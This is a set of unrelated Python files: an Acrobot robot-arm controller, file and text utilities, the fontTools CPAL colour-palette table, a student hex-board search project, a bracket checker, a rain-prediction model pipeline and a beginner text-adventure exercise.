    omega1 = LINK_MASS_1 * LINK_COM_POS_1 ** 2 + LINK_MASS_2 * LINK_LENGTH_1 ** 2 + LINK_MOI1
    omega2 = LINK_MASS_2 * LINK_COM_POS_2 ** 2 + LINK_MOI2
    omega3 = LINK_MASS_2 * LINK_LENGTH_1 * LINK_COM_POS_2
    omega4 = LINK_MASS_1 * LINK_COM_POS_1 + LINK_MASS_2 * LINK_LENGTH_1
    omega5 = LINK_MASS_2 * LINK_COM_POS_2
    # Target point (desired joint angles).
    theta1d = -pi / 4
    theta2d = pi / 2
    # Virtual-constraint parameters: theta1 = a * theta2 + b.
    a = (theta1d + pi / 2) / theta2d
    b = -pi / 2
    def __init__(self):
        """No state beyond a display name; all parameters are class-level."""
        self.name="control"
    def F(self,x):
        """Closed-form antiderivative term used by U() (depends on A, B set in U)."""
        F=(self.A*self.omega4+0.5*self.B*self.omega5)/self.a*sin(self.a*x+self.b)+(self.A*self.omega5+0.5*self.B*self.omega4)/(self.a+1)*sin((self.a+1)*x+self.b)\
            +0.5*self.B*self.omega4/(self.a-1)*sin((self.a-1)*x+self.b)+0.5*self.B*self.omega5/(self.a+2)*sin((self.a+2)*x+self.b)
        return F
    def U(self,s):
        """Transverse term: dtheta2^2 minus the reduced-dynamics velocity Y.

        *s* is the state [theta1, theta2, dtheta1, dtheta2]; also caches
        A, B and Y0 on the instance for use by F() and Torque().
        """
        self.s=s
        self.A = self.omega2 + self.a * self.omega1 + self.a * self.omega2
        self.B = (1 + 2 * self.a) * self.omega3
        self.Y0 =0
        Y = -(2 * self.g * (self.F(self.s[1]) - self.F(self.theta2d))) / (self.A + self.B * cos(self.s[1])) ** 2 + \
            self.Y0 * ((self.A + self.B * cos(self.theta2d)) / (self.A + self.B * cos(self.s[1]))) ** 2
        U=self.s[3]**2-Y
        return U
    def Torque(self,state):
        """Compute the control torque for state [theta1, theta2, dtheta1, dtheta2]."""
        theta1=state[0]
        theta2=state[1]
        dtheta1=state[2]
        dtheta2=state[3]
        ############################################
        # Controller gains.
        k1=20
        k2=80
        k3=55
        #############################################
        sgn = lambda x: 1 if x > 0 else -1 if x < 0 else 0
        # d11..d22: entries of the (symmetric) mass matrix.
        d11 = self.omega1 + self.omega2 + 2 * self.omega3 * cos(theta2)
        d12 = self.omega2 + self.omega3 * cos(theta2)
        d21 = d12
        d22 = self.omega2
        # h1, h2: Coriolis/centrifugal terms plus viscous and Coulomb friction.
        h1 = -self.omega3 * dtheta2 * sin(theta2) * (2 * dtheta1 + dtheta2) +self.MU11 * dtheta1 + self.MU12 * sgn(dtheta1)
        h2 = self.omega3 * dtheta1 ** 2 * sin(theta2) + self.MU21 * dtheta2 + self.MU22 * sgn(dtheta2)
        # phi1, phi2: gravity terms.
        phi2 = self.omega5 * self.g * cos(theta1 + theta2)
        phi1 = self.omega4 * self.g * cos(theta1) + phi2
        U=self.U(state)
        # h, dh: constraint error theta1 - (a*theta2 + b) and its rate.
        h=theta1-self.b-self.a*theta2
        dh=dtheta1-self.a*dtheta2
        B1=d11+d12
        B2=-self.omega3*sin(theta2)*(2*self.a+1)
        B3=self.omega4*self.g*cos(self.a*theta2+self.b)+self.omega5*self.g*cos(self.a*theta2+self.b+theta2)
        fh=B3-self.omega4*self.g*cos(h+self.a+self.b)+self.omega5*self.g*cos(h+self.a*theta2+self.b+theta2)
        fdh=2*self.omega3*dtheta2*sin(theta2)*dh
        v=(k3*atan(U*dtheta2/B1)-B2*U+fh+fdh)/d11# virtual-constraint term
        # Partial feedback linearization of the joint dynamics.
        f1=-(d22*(h1+phi1)-d12*(h2+phi2))/(d11*d22-d12*d21)
        g1=-d12/(d11*d22-d12*d21)
        f2=(d21*(h1+phi1)-d11*(h2+phi2))/(d11*d22-d12*d21)
        g2=d11/(d11*d22-d12*d21)
        # PD-stabilized constraint dynamics, solved for the actuated torque.
        ddh=v-k1*dh-k2*h
        T=(ddh-f1+self.a*f2)/(g1-self.a*g2)
        return T
if __name__ == '__main__':
    env=gym.make('Acrobot-v1')
    control=CONTROL()
    # Data collection: (state, action, reward, next_state, done) tuples.
    buffer = deque()
    normal = [1, 1, 1, 1, 4 * np.pi, 9 * np.pi]
    # Plotting variables (used only by the commented-out plotting code below).
    Theta1=[]
    Theta2=[]
    Theta1d=[]
    Theta2d=[]
    Theta1_velocity=[]
    Theta2_velocity=[]
    Action=[]
    Action_smoothing=[]
    Tau_theta1=[]
    for _ in range(10):
        state = env.reset()
        print(_)
        for step in range(1000):
            # env.render()
            if step==0:
                action=[0]
            else:
                # NOTE(review): Torque is fed inf[0] from the *previous* step's
                # info; this assumes an env whose step-info is indexable and
                # carries the raw joint state - the stock gym Acrobot-v1
                # returns an info dict, so confirm a modified env is in use.
                action=[np.clip(control.Torque(inf[0]),-10,10)]
            next_state, r, done, inf = env.step(action)
            action=np.array(action)/10
            buffer.append((state / normal, action, r, next_state / normal, done))
            # Theta1.append(inf[0][0])
            # Theta2.append(inf[0][1])
            # Theta1_velocity.append(inf[0][2])
            # Theta2_velocity.append(inf[0][3])
            # Action.append(action)
            if done:
                break
            state = next_state
        # plt.figure(1)
        # plt.plot(Theta1,'r-',label='Theta1')
        # plt.plot(Theta1d,'g--',label='Theta1d')
        # plt.plot(Theta2, 'b-', label='Theta2')
        # plt.plot(Theta2d,'y--',label='Theta2d')
        # plt.legend()
        # plt.figure(2)
        # plt.plot(Action,'r-',label='Action')
        # plt.show()
    # NOTE(review): the backslash path only works because '\o' is not an
    # escape sequence, and the file handle from open() is never closed -
    # prefer a raw string / os.path.join and a with-block.
    pickle.dump(buffer, open('data\object_demo.pickle', 'wb'))
    # Tau_theta1.append(a_smoothing[0]*inf[0][2])
    # Theta1.append(inf[0][0])
    # Theta2.append(inf[0][1])
    # Theta1_velocity.append(inf[0][2])
    # Theta2_velocity.append(inf[0][3])
    # Theta1d.append(-pi/4)
    # Theta2d.append(pi/2)
    # Action.append(a)
    # Action_smoothing.append(a_smoothing)
    ###################################
    # plt.figure(1)
    # plt.plot(Theta1,'r-',label='Theta1')
    # plt.plot(Theta1d,'g--',label='Theta1d')
    # plt.plot(Theta2, 'b-', label='Theta2')
    # plt.plot(Theta2d,'y--',label='Theta2d')
    # plt.legend()
    # plt.figure(2)
    # plt.plot(Action,'r-',label='Action')
    # plt.plot(Action_smoothing,'b-',label='Action_smoothing')
    # plt.legend()
    # plt.figure(3)
    # plt.plot(Theta1_velocity,'r-',label='Theta1_volocity')
    # plt.plot(Theta2_velocity, 'b-', label='Theta2_volocity')
    # plt.legend()
    # plt.figure(4)
    # plt.plot(Tau_theta1,label='Tau*Theta1')
    # plt.legend()
    # plt.grid()
    # plt.show()
    # #################################
|
import os
def readAllFiles(path):
    """Return the full paths of every entry directly inside *path*.

    Uses os.path.join so the result is correct whether or not *path* ends
    with a separator; the original did bare string concatenation, which
    produced broken paths like 'dirfile' when the separator was missing.
    """
    return [os.path.join(path, name) for name in os.listdir(path)]
def readFile(file):
    """Return the first two lines of *file* (UTF-8), without trailing newlines.

    The original leaked the file handle; a with-block now guarantees closure.
    """
    with open(file, "r", encoding='utf-8') as f:
        content = f.read().split('\n')
    return content[0], content[1]
def readDataFile(name):
    """Return the first two lines of input-files/<name>, without newlines.

    The original leaked the file handle; a with-block now guarantees closure.
    """
    with open("input-files/" + name, "r") as f:
        content = f.read().split('\n')
    return content[0], content[1]
|
import re, sys
regex_pattern = "([,;:.!?\"]|\w+)"
# Tokenize stdin: print each punctuation mark or run of word characters
# on its own line.
for raw_line in sys.stdin:
    for token in re.findall(regex_pattern, raw_line.strip()):
        print(token)
|
# Copyright 2013 Google, Inc. All Rights Reserved.
#
# Google Author(s): Behdad Esfahbod
from fontTools.misc.textTools import bytesjoin, safeEval
from . import DefaultTable
import array
from collections import namedtuple
import struct
import sys
class table_C_P_A_L_(DefaultTable.DefaultTable):
    """Color Palette (CPAL) table: palettes of 4-byte BGRA color records.

    Handles format versions 0 and 1; version 1 adds palette types, palette
    labels and palette-entry labels (name-table IDs).
    """

    # Sentinel name ID meaning "no label assigned".
    NO_NAME_ID = 0xFFFF
    DEFAULT_PALETTE_TYPE = 0

    def __init__(self, tag=None):
        DefaultTable.DefaultTable.__init__(self, tag)
        self.palettes = []
        self.paletteTypes = []
        self.paletteLabels = []
        self.paletteEntryLabels = []

    def decompile(self, data, ttFont):
        """Parse binary CPAL data into palettes and (v1) metadata arrays."""
        (
            self.version,
            self.numPaletteEntries,
            numPalettes,
            numColorRecords,
            goffsetFirstColorRecord,
        ) = struct.unpack(">HHHHL", data[:12])
        assert (
            self.version <= 1
        ), "Version of CPAL table is higher than I know how to handle"
        self.palettes = []
        pos = 12
        for i in range(numPalettes):
            # Each palette is a start index into the shared color-record array.
            startIndex = struct.unpack(">H", data[pos : pos + 2])[0]
            assert startIndex + self.numPaletteEntries <= numColorRecords
            pos += 2
            palette = []
            ppos = goffsetFirstColorRecord + startIndex * 4
            for j in range(self.numPaletteEntries):
                palette.append(Color(*struct.unpack(">BBBB", data[ppos : ppos + 4])))
                ppos += 4
            self.palettes.append(palette)
        if self.version == 0:
            # Version 0 has no metadata arrays; zero offsets yield defaults below.
            offsetToPaletteTypeArray = 0
            offsetToPaletteLabelArray = 0
            offsetToPaletteEntryLabelArray = 0
        else:
            pos = 12 + numPalettes * 2
            (
                offsetToPaletteTypeArray,
                offsetToPaletteLabelArray,
                offsetToPaletteEntryLabelArray,
            ) = struct.unpack(">LLL", data[pos : pos + 12])
        self.paletteTypes = self._decompileUInt32Array(
            data,
            offsetToPaletteTypeArray,
            numPalettes,
            default=self.DEFAULT_PALETTE_TYPE,
        )
        self.paletteLabels = self._decompileUInt16Array(
            data, offsetToPaletteLabelArray, numPalettes, default=self.NO_NAME_ID
        )
        self.paletteEntryLabels = self._decompileUInt16Array(
            data,
            offsetToPaletteEntryLabelArray,
            self.numPaletteEntries,
            default=self.NO_NAME_ID,
        )

    def _decompileUInt16Array(self, data, offset, numElements, default=0):
        """Read a big-endian uint16 array at *offset*; defaults when offset is 0."""
        if offset == 0:
            return [default] * numElements
        result = array.array("H", data[offset : offset + 2 * numElements])
        if sys.byteorder != "big":
            result.byteswap()
        assert len(result) == numElements, result
        return result.tolist()

    def _decompileUInt32Array(self, data, offset, numElements, default=0):
        """Read a big-endian uint32 array at *offset*; defaults when offset is 0."""
        if offset == 0:
            return [default] * numElements
        result = array.array("I", data[offset : offset + 4 * numElements])
        if sys.byteorder != "big":
            result.byteswap()
        assert len(result) == numElements, result
        return result.tolist()

    def compile(self, ttFont):
        """Serialize the table to binary, de-duplicating identical palettes."""
        colorRecordIndices, colorRecords = self._compileColorRecords()
        paletteTypes = self._compilePaletteTypes()
        paletteLabels = self._compilePaletteLabels()
        paletteEntryLabels = self._compilePaletteEntryLabels()
        numColorRecords = len(colorRecords) // 4
        offsetToFirstColorRecord = 12 + len(colorRecordIndices)
        if self.version >= 1:
            # Version 1 inserts three uint32 offsets after the palette indices.
            offsetToFirstColorRecord += 12
        header = struct.pack(
            ">HHHHL",
            self.version,
            self.numPaletteEntries,
            len(self.palettes),
            numColorRecords,
            offsetToFirstColorRecord,
        )
        if self.version == 0:
            dataList = [header, colorRecordIndices, colorRecords]
        else:
            pos = offsetToFirstColorRecord + len(colorRecords)
            if len(paletteTypes) == 0:
                offsetToPaletteTypeArray = 0
            else:
                offsetToPaletteTypeArray = pos
                pos += len(paletteTypes)
            if len(paletteLabels) == 0:
                offsetToPaletteLabelArray = 0
            else:
                offsetToPaletteLabelArray = pos
                pos += len(paletteLabels)
            if len(paletteEntryLabels) == 0:
                offsetToPaletteEntryLabelArray = 0
            else:
                offsetToPaletteEntryLabelArray = pos
                # NOTE(review): advances by len(paletteLabels), not
                # len(paletteEntryLabels). Harmless today because pos is
                # unused afterwards, but a trap if another array is appended.
                pos += len(paletteLabels)
            header1 = struct.pack(
                ">LLL",
                offsetToPaletteTypeArray,
                offsetToPaletteLabelArray,
                offsetToPaletteEntryLabelArray,
            )
            dataList = [
                header,
                colorRecordIndices,
                header1,
                colorRecords,
                paletteTypes,
                paletteLabels,
                paletteEntryLabels,
            ]
        return bytesjoin(dataList)

    def _compilePalette(self, palette):
        """Pack one palette's colors as consecutive 4-byte BGRA records."""
        assert len(palette) == self.numPaletteEntries
        pack = lambda c: struct.pack(">BBBB", c.blue, c.green, c.red, c.alpha)
        return bytesjoin([pack(color) for color in palette])

    def _compileColorRecords(self):
        """Pack all palettes, pooling identical ones to share color records."""
        colorRecords, colorRecordIndices, pool = [], [], {}
        for palette in self.palettes:
            packedPalette = self._compilePalette(palette)
            if packedPalette in pool:
                index = pool[packedPalette]
            else:
                index = len(colorRecords)
                colorRecords.append(packedPalette)
                pool[packedPalette] = index
            colorRecordIndices.append(struct.pack(">H", index * self.numPaletteEntries))
        return bytesjoin(colorRecordIndices), bytesjoin(colorRecords)

    def _compilePaletteTypes(self):
        """Pack the v1 palette-type array, or b'' when absent or all default."""
        if self.version == 0 or not any(self.paletteTypes):
            return b""
        assert len(self.paletteTypes) == len(self.palettes)
        result = bytesjoin([struct.pack(">I", ptype) for ptype in self.paletteTypes])
        assert len(result) == 4 * len(self.palettes)
        return result

    def _compilePaletteLabels(self):
        """Pack the v1 palette-label array, or b'' when every label is unset."""
        if self.version == 0 or all(l == self.NO_NAME_ID for l in self.paletteLabels):
            return b""
        assert len(self.paletteLabels) == len(self.palettes)
        result = bytesjoin([struct.pack(">H", label) for label in self.paletteLabels])
        assert len(result) == 2 * len(self.palettes)
        return result

    def _compilePaletteEntryLabels(self):
        """Pack the v1 palette-entry-label array, or b'' when every label is unset."""
        if self.version == 0 or all(
            l == self.NO_NAME_ID for l in self.paletteEntryLabels
        ):
            return b""
        assert len(self.paletteEntryLabels) == self.numPaletteEntries
        result = bytesjoin(
            [struct.pack(">H", label) for label in self.paletteEntryLabels]
        )
        assert len(result) == 2 * self.numPaletteEntries
        return result

    def toXML(self, writer, ttFont):
        """Write the table as TTX: version, entry count, palettes, entry labels."""
        numPalettes = len(self.palettes)
        paletteLabels = {i: nameID for (i, nameID) in enumerate(self.paletteLabels)}
        paletteTypes = {i: typ for (i, typ) in enumerate(self.paletteTypes)}
        writer.simpletag("version", value=self.version)
        writer.newline()
        writer.simpletag("numPaletteEntries", value=self.numPaletteEntries)
        writer.newline()
        for index, palette in enumerate(self.palettes):
            attrs = {"index": index}
            paletteType = paletteTypes.get(index, self.DEFAULT_PALETTE_TYPE)
            paletteLabel = paletteLabels.get(index, self.NO_NAME_ID)
            if self.version > 0 and paletteLabel != self.NO_NAME_ID:
                attrs["label"] = paletteLabel
            if self.version > 0 and paletteType != self.DEFAULT_PALETTE_TYPE:
                attrs["type"] = paletteType
            writer.begintag("palette", **attrs)
            writer.newline()
            if (
                self.version > 0
                and paletteLabel != self.NO_NAME_ID
                and ttFont
                and "name" in ttFont
            ):
                # Human-readable name emitted as a comment for readability.
                name = ttFont["name"].getDebugName(paletteLabel)
                if name is not None:
                    writer.comment(name)
                    writer.newline()
            assert len(palette) == self.numPaletteEntries
            for cindex, color in enumerate(palette):
                color.toXML(writer, ttFont, cindex)
            writer.endtag("palette")
            writer.newline()
        if self.version > 0 and not all(
            l == self.NO_NAME_ID for l in self.paletteEntryLabels
        ):
            writer.begintag("paletteEntryLabels")
            writer.newline()
            for index, label in enumerate(self.paletteEntryLabels):
                if label != self.NO_NAME_ID:
                    writer.simpletag("label", index=index, value=label)
                    if self.version > 0 and label and ttFont and "name" in ttFont:
                        name = ttFont["name"].getDebugName(label)
                        if name is not None:
                            writer.comment(name)
                    writer.newline()
            writer.endtag("paletteEntryLabels")
            writer.newline()

    def fromXML(self, name, attrs, content, ttFont):
        """Rebuild the table from TTX elements (inverse of toXML)."""
        if name == "palette":
            self.paletteLabels.append(int(attrs.get("label", self.NO_NAME_ID)))
            self.paletteTypes.append(int(attrs.get("type", self.DEFAULT_PALETTE_TYPE)))
            palette = []
            for element in content:
                if isinstance(element, str):
                    continue
                attrs = element[1]
                color = Color.fromHex(attrs["value"])
                palette.append(color)
            self.palettes.append(palette)
        elif name == "paletteEntryLabels":
            colorLabels = {}
            for element in content:
                if isinstance(element, str):
                    continue
                elementName, elementAttr, _ = element
                if elementName == "label":
                    labelIndex = safeEval(elementAttr["index"])
                    nameID = safeEval(elementAttr["value"])
                    colorLabels[labelIndex] = nameID
            # Missing indices fall back to the "no label" sentinel.
            self.paletteEntryLabels = [
                colorLabels.get(i, self.NO_NAME_ID)
                for i in range(self.numPaletteEntries)
            ]
        elif "value" in attrs:
            # Simple scalar fields such as <version> and <numPaletteEntries>.
            value = safeEval(attrs["value"])
            setattr(self, name, value)
            if name == "numPaletteEntries":
                self.paletteEntryLabels = [self.NO_NAME_ID] * self.numPaletteEntries
class Color(namedtuple("Color", "blue green red alpha")):
    """BGRA color record as stored in CPAL, displayed as '#RRGGBBAA' hex."""

    def hex(self):
        """Return the color formatted as '#RRGGBBAA'."""
        return "#%02X%02X%02X%02X" % (self.red, self.green, self.blue, self.alpha)

    def __repr__(self):
        return self.hex()

    def toXML(self, writer, ttFont, index=None):
        """Emit a <color> TTX element carrying the hex value."""
        writer.simpletag("color", value=self.hex(), index=index)
        writer.newline()

    @classmethod
    def fromHex(cls, value):
        """Parse '#RRGGBB[AA]'; the '#' is optional and alpha defaults to 0xFF."""
        if value[0] == "#":
            value = value[1:]
        red, green, blue = (int(value[i : i + 2], 16) for i in (0, 2, 4))
        alpha = int(value[6:8], 16) if len(value) >= 8 else 0xFF
        return cls(red=red, green=green, blue=blue, alpha=alpha)

    @classmethod
    def fromRGBA(cls, red, green, blue, alpha):
        """Alternate constructor taking channels in RGBA order."""
        return cls(red=red, green=green, blue=blue, alpha=alpha)
|
"""
COMP30024 Artificial Intelligence, Semester 1, 2021
Project Part A: Searching
This script contains the entry point to the program (the code in
`__main__.py` calls `main()`). Your solution starts here!
"""
import itertools
import json
import sys
from classes.Hex import *
from classes.RouteInfo import RouteInfo
from search.BFS import bfs
from search.util import *
# Visited list handed to every bfs call in getAllRoutes (shared across searches).
visited = []
def main():
    """Load the board JSON named on the command line, print it, find all routes."""
    try:
        with open(sys.argv[1]) as fp:
            board_data = json.load(fp)
    except IndexError:
        # No input file argument was supplied.
        print("usage: python3 -m search path/to/input.json", file=sys.stderr)
        sys.exit(1)
    board_dict = create_board(board_data)
    print_board(board_dict, compact=True)
    routes = getAllRoutes(board_data, board_dict)
def getAllRoutes(data, board_dict, show_routes=True):
    """Compute BFS routes from each 'upper' token to every 'lower' token it beats.

    :param data: parsed input JSON with 'upper' and 'lower' token lists,
        entries shaped [symbol, r, q]
    :param board_dict: board mapping produced by create_board
    :param show_routes: when True, print each route after sorting
    :return: list of RouteInfo, sorted per RouteInfo's ordering

    NOTE(review): the module-level `visited` list is passed to every bfs call;
    if bfs mutates it without resetting, state leaks between searches — confirm
    bfs's contract.
    """
    sources = data["upper"]
    destinations = data["lower"]
    src_dst_pairs = []
    routes = []
    for src, dst in itertools.product(sources, destinations):
        src_hex = Hex(Coord(src[1], src[2]), getEnumByName(src[0], Token))
        dst_hex = Hex(Coord(dst[1], dst[2]), getEnumByName(dst[0], Token))
        # Only route toward targets this token's type defeats.
        if src_hex.token.battle(dst_hex.token):
            src_dst_pairs.append([src_hex, dst_hex])
            routes.append(RouteInfo(src_hex, dst_hex, bfs(src_hex, dst_hex.coord, board_dict, visited).extractRoute()))
    # sort rule implemented in RouteInfo class
    routes.sort()
    if show_routes:
        for i in routes:
            print(f"{i.src_hex.coord.toTuple()} to {i.dst_hex.coord.toTuple()}\n"
                  f"Route: {i.route} length {len(i.route)}")
    return routes
# Sample board states for the (commented-out) visualizer calls below.
states = [
    {
        (0, 0): "hello",
        (0, 2): "world",
        (3, -2): "(p)",
        (2, -1): "(S)",
        (-4, 0): "(R)",
    },
    {
        (0, 1): "hello",
        (0, 2): "world",
        (3, -2): "(p)",
        (2, -1): "(S)",
        (-4, 0): "(R)",
    },
    {
        # NOTE(review): duplicate key — this (0, 2) entry is silently
        # overwritten by the next line; given the pattern of the first two
        # states, one of the coordinates is probably wrong.
        (0, 2): "hello",
        (0, 2): "world",
        (3, -2): "(p)",
        (2, -1): "(S)",
        (-4, 0): "(R)",
    }
]
#visualize_test(states, 0.4)
# test()
|
#===============================================================================
# import math
# import re
# print (int(math.fmod(43,45)))
# print (22/3)
# w = "Hello World"
# print (w[-1])
#
# print("Yes") if '26-03-2017' > '29-12-2016' else print("No")
#
# st = "asd_fd"
#
# print("Valid") if re.match("^[a-zA-Z.0-9_-]*$",st ) else print("Not valid")
# print("Valid") if re.match("^[a-zA-Z0-9]*$", st[-1]) else print("Not valid")
#
# list1 = ["mon","tue","wed","thu","fri","sat"]
# tuple1 = tuple(list1)
#
# print(list1.count("n"))
# print(tuple1.count("n"))
#===============================================================================
#import datetime
#print(datetime.datetime.strptime("25-12-2018","%d-%m-%Y"))
openList = ["[","{","("]
closeList = ["]","}",")"]

def balance(myStr):
    """Return True when every bracket in *myStr* is properly matched and nested.

    Non-bracket characters are ignored. Fixes vs. original: the debug
    print(stack) on every push is removed, and unclosed brackets now return
    False explicitly instead of falling through and returning None.
    """
    pairs = dict(zip(closeList, openList))  # closer -> expected opener
    stack = []
    for ch in myStr:
        if ch in openList:
            stack.append(ch)
        elif ch in closeList:
            if not stack or stack[-1] != pairs[ch]:
                return False
            stack.pop()
    return not stack
# Read one line from stdin and report whether its brackets balance.
str_input = input()
test_balance = balance(str_input)
print("Valid" if test_balance else "Invalid")
|
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
import warnings
from category_encoders import OrdinalEncoder
from sklearn.experimental import enable_iterative_imputer
from sklearn.impute import IterativeImputer
from sklearn.linear_model import LinearRegression
from sklearn.ensemble import RandomForestClassifier
from xgboost import XGBClassifier
from sklearn.pipeline import Pipeline
from sklearn.model_selection import train_test_split
from imblearn.over_sampling import SMOTE
from sklearn.tree import DecisionTreeClassifier
from sklearn.model_selection import RandomizedSearchCV
import numpy as np
from sklearn.metrics import accuracy_score
from sklearn.metrics import plot_confusion_matrix
from sklearn.metrics import roc_auc_score
from sklearn.metrics import roc_curve
from sklearn.preprocessing import StandardScaler
import pickle
import os
# ---------------------------------------------------------------------------
# Australia "rain tomorrow" classifier: load data, clean and target-encode
# features, impute gaps, balance classes with SMOTE, train XGBoost, pickle it.
# ---------------------------------------------------------------------------
warnings.filterwarnings('ignore')
# NOTE(review): non-raw Windows path ("\D" happens not to be an escape
# sequence) -- a raw string r"F:\..." would be safer.
os.chdir("F:\Deploy Australia Weather Prediction")
print(os.getcwd())
df = pd.read_csv("F:\\Project CSV's\\weatherAUS.csv")
print(df.head())
print(len(df['Location'].unique()))
# Emit <option> tags, apparently for a web-form dropdown of wind directions.
for i in df['WindGustDir'].unique():
    print(f'<option value="{i}">')
df.shape
df.info()
df.isna().sum()
# Drop every column with more than 25% missing values.
thresholdmissing = (df.shape[0]*25)/100
df['MinTemp'].isna().sum()
for i in df.columns:
    if df[i].isna().sum()>thresholdmissing:
        df = df.drop([i],axis=1)
df.shape
df.head()
df = df.drop(['Date'],axis=1)
df.head()
# Collapse the paired 9am/3pm readings into single daily means.
df['Humidity'] = (df['Humidity9am']+df['Humidity3pm'])/2
df['Pressure'] = (df['Pressure9am']+df['Pressure3pm'])/2
df['Temp'] = (df['Temp9am']+ df['Temp3pm'])/2
df.columns
df = df.drop(['WindDir9am', 'WindDir3pm', 'WindSpeed9am','WindSpeed3pm', 'Humidity9am',
       'Humidity3pm', 'Pressure9am','Pressure3pm', 'Temp9am', 'Temp3pm'],axis=1)
df.head()
df.isna().sum()
# Commented out IPython magic to ensure Python compatibility.
# %matplotlib qt
sns.countplot(df['Location'])
plt.xticks(rotation=90)
plt.plot()
df['Location'].unique()
# Merge the airport stations into their parent cities.
df['Location'].replace('SydneyAirport','Sydney',inplace=True)
df['Location'].replace('MelbourneAirport','Melbourne',inplace=True)
df['Location'].replace('PerthAirport','Perth',inplace=True)
df['Location'].unique()
# Commented out IPython magic to ensure Python compatibility.
# %matplotlib qt
sns.countplot(df['Location'])
plt.xticks(rotation=90)
plt.plot()
df.isna().sum()
df['WindGustDir'].unique()
sns.countplot(df['WindGustDir'])
plt.xticks(rotation=90)
plt.plot()
df['WindGustDir'].value_counts()
df['RainToday'].unique()
sns.countplot(df['RainToday'])
sns.countplot(df['RainTomorrow'])
df['RainTomorrow'].value_counts()
df.shape[0]*0.30
df.head()
# Drop rows where the label or the key categorical features are missing.
df = df[~(df['RainTomorrow'].isna())]
df = df[~(df['RainToday'].isna())]
df = df[~(df['WindGustDir'].isna())]
df.isna().sum()
df.shape
df['RainTomorrow'].value_counts()
df = df.reset_index()
df = df.drop(['index'],axis=1)
df.head()
# Binary-encode the label: No -> 0, Yes -> 1.
raintom = {'No':0,
           'Yes':1}
df['RainTomorrow'] = df['RainTomorrow'].map(raintom)
df.head()
df['RainTomorrow'].unique()
# Target-(mean-)encode the categorical features against RainTomorrow.
dfloc = df.groupby(df['Location'])['RainTomorrow'].mean().to_dict()
df['Location']=df['Location'].map(dfloc)
print(dfloc)
df.head()
dfdir = df.groupby(df['WindGustDir'])['RainTomorrow'].mean().to_dict()
print(dfdir)
df['WindGustDir']=df['WindGustDir'].map(dfdir)
df.head()
dftoday = df.groupby(df['RainToday'])['RainTomorrow'].mean().to_dict()
print(dftoday)
df['RainToday']=df['RainToday'].map(dftoday)
df.head()
df = df.drop(['MinTemp','MaxTemp'],axis=1)
df.head()
df.isna().sum()
# Fill remaining numeric gaps via iterative, regression-based imputation.
estimator = LinearRegression()
imp = IterativeImputer(estimator,max_iter=100)
dfnew = imp.fit_transform(df)
dfnew = pd.DataFrame(dfnew,columns = df.columns)
dfnew.isna().sum()
x = dfnew.drop(['RainTomorrow'],axis=1)
y = dfnew[['RainTomorrow']]
# NOTE(review): missing call parentheses -- this prints the bound method;
# probably meant x['Location'].unique().
print(x['Location'].unique)
y.head()
print(x.columns)
# NOTE(review): the label is re-taken from the pre-imputation df rather than
# dfnew -- relies on index alignment; confirm this is intended.
y['RainTomorrow'] = df['RainTomorrow'].astype('category')
train_x,test_x,train_y,test_y = train_test_split(x,y,test_size=0.3,random_state=42)
train_x.shape,test_x.shape,train_y.shape,test_y.shape
# Oversample the minority class on the training split only (avoids leakage).
sm = SMOTE(random_state=42)
train_x_sm,train_y_sm = sm.fit_resample(train_x,train_y)
train_y_sm.value_counts()
model = XGBClassifier(n_estimators=350,subsample =1.0,max_depth=6,learning_rate=0.12244897959183673,
                      gamma=8,colsample_bytree=0.8,booster='gbtree')
model.fit(train_x_sm,train_y_sm)
pred_train = model.predict(train_x)
pred_test = model.predict(test_x)
# NOTE(review): accuracy_score's signature is (y_true, y_pred); the swapped
# order is harmless here because accuracy is symmetric.
print(accuracy_score(pred_train,train_y))
print(accuracy_score(pred_test,test_y))
# Persist the trained model and reload it as a smoke test.
pickle.dump(model,open('AusWeather.pkl','wb'))
AusWeather = pickle.load(open('AusWeather.pkl','rb'))
|
from sys import exit # importing the exit feature from system
def gold_room(): # defines the function for the gold room
print "This room is full of gold. How much do you take?" # ask for user input
next = raw_input("> ") # collects user inputs
if "0" in next or "1" in next: # creates conditions for user inputs to run if..
how_much = int(next) # collects a integer or number
else:
dead("Man, learn to type a number.") # this prints if user does not put in 0 or 1 number
if how_much < 50: # creates condition for user inputs for how much if it is less than 50
print "Nice, you're not greedy, you win!"
exit(0) # this exits the loop and stops
else: # if users how much is more than 50 it prints
dead("You greedy bastard!")
def bear_room(): # defines a function for bear_room
print "There is a bear here."
print "The bear has a bunch of honey."
print "The fat bear is in front of another door."
print "How are you going to move the bear?"
# need more clarity on the relevance of the bear_moved expression
bear_moved = False # set bear_moved false creates boolean test
while True: # creates while loop for users input how they are moving the bear creates an infinite loop for this
#until it reaches a false. or when they enter a correct option.
next = raw_input("> ") # collects user input
if next == "take honey": # creates condition to move bear
dead("The bear looks at you then slaps your face off") # prints and calls dead function (Good Job!)
elif next == "taunt bear" and not bear_moved: # creates condition if taunt bear and true (not false)
print ("The bears has moved from the door. You can go through it now")
bear_moved = True # reassigns bear_moved to True
elif next == "taunt bear" and bear_moved: # if you taunt bear and bear moved true then
dead("The bear gets pissed off and chews your leg off.")
elif next == "open door" and bear_moved: # if user opens door and bear moves then they start gold_room
gold_room()
else: # if none of the user input applies then type
print " I got no idea what that means"
def cthulhu_room(): # defines a new function for cthulhu to run when called
print "Here you see the great evil Cthulhu."
print "He, it, whatever stares at you and you go insane"
print "Do you flee for your life or eat your head?"
next = raw_input("> ")
if "flee" in next: # if user is flee then it goes to start function
start()
elif "head" in next: # if user inputs is head it prints dead value and well that ...
dead("Well that was tasty!")
else: # if user chooses neither then it calls cthulhu function to run again
cthulhu_room()
# dead() centralises the "game over" path: every losing branch calls it,
# so the farewell message and the process exit live in one place.
def dead(why): # creates a function to be called
    print why, "Good Job!" # prints the reason followed by the sign-off
    exit(0) # terminate the program; dead() never returns
def start(): # this is the start function to start and run the program
print "You are in a dark room."
print "There is a door to your right and left."
print "Which one do you take?"
next = raw_input("> ") # takes user input
if next == "left": # conditions for user input
bear_room() # if they choose left it will loop to the bear_room function
elif next == "right": # if they choose right it loops to cthulhu_room function
cthulhu_room()
else: # if they choose neither and something else then it runs dead and ends.
dead("You stumble around the room until you starve.")
start() # kick off the game at the entry room
# The lesson notes below are kept as a module-level string literal
# (it is evaluated and discarded; no runtime effect).
""" study drill
1. map of the game
start - begins the game and ask for options which door
through room: bear room or cthulu room or gold rooms with what happens.
2. fixed mistakes
3. written comments two items i don't quite understand is the necessity for the dead function,
and the bear_moved expression
4.
5. the bugs in typing a number with 0 or 1 in the gold room are that if you do numbers without it will keep saying
it doesn't understand what that means. """
